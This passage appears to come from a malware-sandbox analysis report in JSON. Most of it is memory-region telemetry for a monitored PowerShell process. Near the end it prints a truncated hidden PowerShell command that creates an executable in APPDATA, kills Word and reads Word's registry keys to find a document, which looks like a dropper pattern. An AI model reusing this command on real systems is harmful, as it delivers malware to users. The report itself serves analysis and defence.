"start_va": 449970176, "timestamp": "00:01:09.194", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001628-addr_0x000000001b3f0000-size_0x0000000000101000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_279", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 457113600, "type": "region", "version": 1 }, "end_va": 458166271, "entry_point": 0, "filename": null, "id": "region_1628", "name": "private_0x000000001b3f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 457113600, "timestamp": "00:01:09.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 15581184, "start_va": 8791305158656, "type": "region", "version": 1 }, "end_va": 8791320739839, "entry_point": 8791305158656, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "id": "region_1629", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791305158656, "timestamp": "00:01:09.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 8791798185984, "type": "region", "version": 1 }, "end_va": 8791798251519, 
"entry_point": 0, "filename": null, "id": "region_1630", "name": "private_0x000007ff00020000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798185984, "timestamp": "00:01:09.196", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001631-addr_0x000007ff00030000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_280", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798251520, "type": "region", "version": 1 }, "end_va": 8791798317055, "entry_point": 0, "filename": null, "id": "region_1631", "name": "private_0x000007ff00030000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798251520, "timestamp": "00:01:09.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 655360, "start_va": 8791798317056, "type": "region", "version": 1 }, "end_va": 8791798972415, "entry_point": 0, "filename": null, "id": "region_1632", "name": "private_0x000007ff00040000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798317056, "timestamp": "00:01:09.197", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001633-addr_0x000007ff000e0000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_281", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, 
"start_va": 8791798972416, "type": "region", "version": 1 }, "end_va": 8791799037951, "entry_point": 0, "filename": null, "id": "region_1633", "name": "private_0x000007ff000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798972416, "timestamp": "00:01:09.197", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001634-addr_0x000007ff000f0000-size_0x0000000000070000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_282", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 8791799037952, "type": "region", "version": 1 }, "end_va": 8791799496703, "entry_point": 0, "filename": null, "id": "region_1634", "name": "private_0x000007ff000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799037952, "timestamp": "00:01:09.197", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001635-addr_0x000007fffffd3000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_283", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_1635", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:01:09.197", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001636-addr_0x000007fffffd5000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], 
"ref_process_dump": { "ref_id": "proc_dump_284", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092846080, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_1636", "name": "private_0x000007fffffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092846080, "timestamp": "00:01:09.197", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001705-addr_0x0000000001cd0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_309", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30212096, "type": "region", "version": 1 }, "end_va": 30277631, "entry_point": 0, "filename": null, "id": "region_1705", "name": "private_0x0000000001cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30212096, "timestamp": "00:01:10.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 458227712, "type": "region", "version": 1 }, "end_va": 461250559, "entry_point": 458227712, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_1706", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 458227712, "timestamp": "00:01:10.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 729088, "start_va": 8791263477760, "type": "region", "version": 1 }, "end_va": 8791264206847, "entry_point": 8791263477760, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_1707", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791263477760, "timestamp": "00:01:11.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10629120, "start_va": 8791294476288, "type": "region", "version": 1 }, "end_va": 8791305105407, "entry_point": 8791294476288, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll", "id": "region_1708", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791294476288, "timestamp": "00:01:11.009", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001709-addr_0x000007fffff10000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": 
"proc_dump_310", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8796092039168, "type": "region", "version": 1 }, "end_va": 8796092104703, "entry_point": 0, "filename": null, "id": "region_1709", "name": "private_0x000007fffff10000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092039168, "timestamp": "00:01:11.010", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001710-addr_0x000007fffff20000-size_0x0000000000090000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_311", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 589824, "start_va": 8796092104704, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_1710", "name": "private_0x000007fffff20000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092104704, "timestamp": "00:01:11.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11915264, "start_va": 8791249059840, "type": "region", "version": 1 }, "end_va": 8791260975103, "entry_point": 8791249059840, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll", "id": "region_1727", "name": "system.management.automation.ni.dll", "norm_filename": 
"c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791249059840, "timestamp": "00:01:11.743", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001728-addr_0x000007ff00160000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_320", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799496704, "type": "region", "version": 1 }, "end_va": 8791799562239, "entry_point": 0, "filename": null, "id": "region_1728", "name": "private_0x000007ff00160000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799496704, "timestamp": "00:01:11.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 30277632, "type": "region", "version": 1 }, "end_va": 30289919, "entry_point": 30277632, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_1729", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 30277632, "timestamp": "00:01:11.862", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 42991616, "type": "region", "version": 1 }, "end_va": 43778047, "entry_point": 42991616, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_1730", "name": 
"kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 42991616, "timestamp": "00:01:11.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_1736", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:11.975", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001738-addr_0x0000000001d70000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_321", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 30867456, "type": "region", "version": 1 }, "end_va": 30871551, "entry_point": 0, "filename": null, "id": "region_1738", "name": "private_0x0000000001d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 30867456, "timestamp": "00:01:12.111", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 35913728, "type": "region", "version": 1 }, "end_va": 35934207, "entry_point": 35913728, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_1747", "name": "sorttbls.nlp", "norm_filename": 
"c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 35913728, "timestamp": "00:01:12.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 35979264, "type": "region", "version": 1 }, "end_va": 36245503, "entry_point": 35979264, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_1748", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 35979264, "timestamp": "00:01:12.326", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001749-addr_0x000007ff00170000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_326", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799562240, "type": "region", "version": 1 }, "end_va": 8791799627775, "entry_point": 0, "filename": null, "id": "region_1749", "name": "private_0x000007ff00170000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799562240, "timestamp": "00:01:12.327", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 36306944, "type": "region", "version": 1 }, "end_va": 36339711, "entry_point": 36319278, "filename": 
"\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_1784", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 36306944, "timestamp": "00:01:16.543", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 41091072, "type": "region", "version": 1 }, "end_va": 41095167, "entry_point": 0, "filename": null, "id": "region_1785", "name": "pagefile_0x0000000002730000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41091072, "timestamp": "00:01:16.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 41156608, "type": "region", "version": 1 }, "end_va": 41160703, "entry_point": 0, "filename": null, "id": "region_1786", "name": "pagefile_0x0000000002740000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41156608, "timestamp": "00:01:16.544", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001787-addr_0x000000001b7f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_330", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 
1048576, "start_va": 461307904, "type": "region", "version": 1 }, "end_va": 462356479, "entry_point": 0, "filename": null, "id": "region_1787", "name": "private_0x000000001b7f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 461307904, "timestamp": "00:01:16.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 299008, "start_va": 505610240, "type": "region", "version": 1 }, "end_va": 505909247, "entry_point": 505885368, "filename": "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_1788", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 505610240, "timestamp": "00:01:16.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 6884820647936, "type": "region", "version": 1 }, "end_va": 6884820688895, "entry_point": 6884820666128, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll", "id": "region_1789", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 6884820647936, "timestamp": "00:01:16.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 253952, "start_va": 
8791238443008, "type": "region", "version": 1 }, "end_va": 8791238696959, "entry_point": 8791238443008, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll", "id": "region_1790", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791238443008, "timestamp": "00:01:16.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1146880, "start_va": 8791239426048, "type": "region", "version": 1 }, "end_va": 8791240572927, "entry_point": 8791239426048, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_1791", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791239426048, "timestamp": "00:01:16.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2187264, "start_va": 8791240605696, "type": "region", "version": 1 }, "end_va": 8791242792959, "entry_point": 8791240605696, "filename": 
"\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_1792", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791240605696, "timestamp": "00:01:16.576", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 937984, "start_va": 8791242833920, "type": "region", "version": 1 }, "end_va": 8791243771903, "entry_point": 8791242833920, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll", "id": "region_1793", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791242833920, "timestamp": "00:01:16.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 696320, "start_va": 8791243816960, "type": "region", "version": 1 }, "end_va": 8791244513279, "entry_point": 8791243816960, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll", "id": "region_1794", "name": "microsoft.wsman.management.ni.dll", "norm_filename": 
"c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791243816960, "timestamp": "00:01:16.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 8791244537856, "type": "region", "version": 1 }, "end_va": 8791244742655, "entry_point": 8791244537856, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll", "id": "region_1795", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791244537856, "timestamp": "00:01:16.584", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 8791244800000, "type": "region", "version": 1 }, "end_va": 8791245230079, "entry_point": 8791244800000, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_1796", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791244800000, "timestamp": "00:01:16.585", 
"type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3334144, "start_va": 8791245258752, "type": "region", "version": 1 }, "end_va": 8791248592895, "entry_point": 8791245258752, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll", "id": "region_1797", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791245258752, "timestamp": "00:01:16.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 41943040, "type": "region", "version": 1 }, "end_va": 42287103, "entry_point": 41943040, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll", "id": "region_1815", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 41943040, "timestamp": "00:01:17.662", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1658880, "start_va": 8791232741376, "type": "region", "version": 1 }, "end_va": 8791234400255, "entry_point": 8791232741376, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll", "id": "region_1816", "name": 
"system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791232741376, "timestamp": "00:01:17.664", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1490944, "start_va": 8791234445312, "type": "region", "version": 1 }, "end_va": 8791235936255, "entry_point": 8791234445312, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll", "id": "region_1817", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791234445312, "timestamp": "00:01:17.665", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 6967296, "start_va": 8791283400704, "type": "region", "version": 1 }, "end_va": 8791290367999, "entry_point": 8791283400704, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll", "id": "region_1818", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791283400704, "timestamp": "00:01:17.665", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No 
dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791557799936, "type": "region", "version": 1 }, "end_va": 8791557828607, "entry_point": 8791557804448, "filename": "\\Windows\\System32\\shfolder.dll", "id": "region_1819", "name": "shfolder.dll", "norm_filename": "c:\\windows\\system32\\shfolder.dll", "region_type": "memory_mapped_file", "start_va": 8791557799936, "timestamp": "00:01:17.666", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 41156608, "type": "region", "version": 1 }, "end_va": 41226239, "entry_point": 0, "filename": null, "id": "region_1862", "name": "pagefile_0x0000000002740000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41156608, "timestamp": "00:01:18.802", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe\" -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, 